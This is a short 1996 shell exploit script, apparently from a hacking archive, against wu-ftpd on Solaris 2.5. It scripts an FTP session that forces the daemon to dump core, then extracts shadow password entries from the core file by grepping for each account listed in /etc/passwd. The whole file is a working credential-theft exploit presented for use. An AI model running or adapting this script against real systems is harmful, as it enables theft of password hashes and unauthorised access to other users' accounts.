#!/bin/sh
#
# exploit a bug in wu-ftpd to assemble & view the shadow passwd file
#
# Tested under Solaris 2.5
#
# James Abendschan  jwa@nbs.nau.edu  16 Oct 1996

USER=`whoami`
/usr/ucb/echo -n "Enter your password for localhost: "
read PASS

WDIR=/tmp/wu-ftpd-sploit.$USER
rm -rf $WDIR
mkdir $WDIR
TMP=$WDIR/strings.tmp

ftp -n localhost << _EOF_
quote user $USER
quote pass $PASS
cd $WDIR
user root woot
quote pasv
_EOF_

if [ ! -f $WDIR/core ]
then
 echo "Sorry, your ftpd didn't dump core."
 exit 1
fi

strings $WDIR/core > $WDIR/tmp

# try to assemble as much of the shadow passwd file as possible
# (easier in perl)

for user in `cat /etc/passwd | awk -F":" '{print $1}'`
do 
 line=`grep \^${user}: $WDIR/tmp`
 echo $line
done 

rm -f $TMP
#                 www.hack.co.za           [2000]#